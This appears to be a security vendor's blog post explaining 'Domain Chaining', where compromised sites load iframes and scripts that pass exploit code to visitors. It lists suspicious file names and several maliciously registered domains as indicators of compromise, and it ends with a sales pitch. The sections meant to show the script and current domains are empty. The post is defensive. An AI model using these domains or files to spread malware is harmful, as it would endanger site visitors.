Malicious hackers are constantly changing tactics in order to evade detection. One of the relatively new mechanisms that has been used to infect thousands of websites on the Internet is known as Domain Chaining.
Domain Chaining is the act of using multiple malware infected domains to form a network that distributes exploit code to benign, legitimate, websites that get compromised. This allows malicious hackers to reliably push exploit code to thousands of compromised websites, infecting the websites themselves and in turn the visitors to these sites.
What is a Domain Chaining attack?
Domain Chaining attacks have been on the rise since the beginning of this year.
The basic concept is as follows:
Why do malicious hackers use this approach?
There are a few benefits to using this mechanism. The first being that it becomes difficult for signature-based and honeypot-based detection systems to home in on the actual source of the malware versus only identifying the distribution points. Another “benefit” is what can be called “failover.”
We have blogged about hackers’ understanding of the necessity of failover in the past. In case any security organization identifies a website in this malware chain as being dangerous and manages to shut it down, by using a number of websites to act as distribution points, the distribution of the actual exploit to website visitors does not stop. Think of it like a multi-headed Hydra.
How do I know if my site is infected?
If your website is part of this Domain Chaining attack, it will most likely have one of these files.
script.php cssminibar.js, sidename.js, jtoolsmini.js, tempjs.js, js.php, jstools.js
What do these files do?
These scripts load code from infected websites harboring malicious Iframes. The malicious Iframes in turn load exploit code via maliciously registered sites.
Maliciously registered sites related to this attack:
Maliciously registered sites related to previous Domain Chaining attacks:
klubnika34his.com, bogdantevye.ru, jwjmusic.cx.cc, frankieeus.ru, gaufridboris.ru, stephanos.ru
The malicious website content is primarily distributed by a file named “wpqonfig.php” that redirects Iframes and scripts to a maliciously registered website.
What script is used in the current attacks?
The latest version of this Domain Chaining attack uses the following script:
How do I protect my site?
Malicious hackers are constantly changing their tactics in order to evade detection and to continue to infect unsuspecting users. It is imperative to keep up-to-date on the latest ways that infections are spreading to legitimate websites.
StopTheHacker.com customers are protected against these kind of threats. If you would like more information on how to protect your website, please feel free to contact us. You can also visit our services page to protect your website now.
Till next time…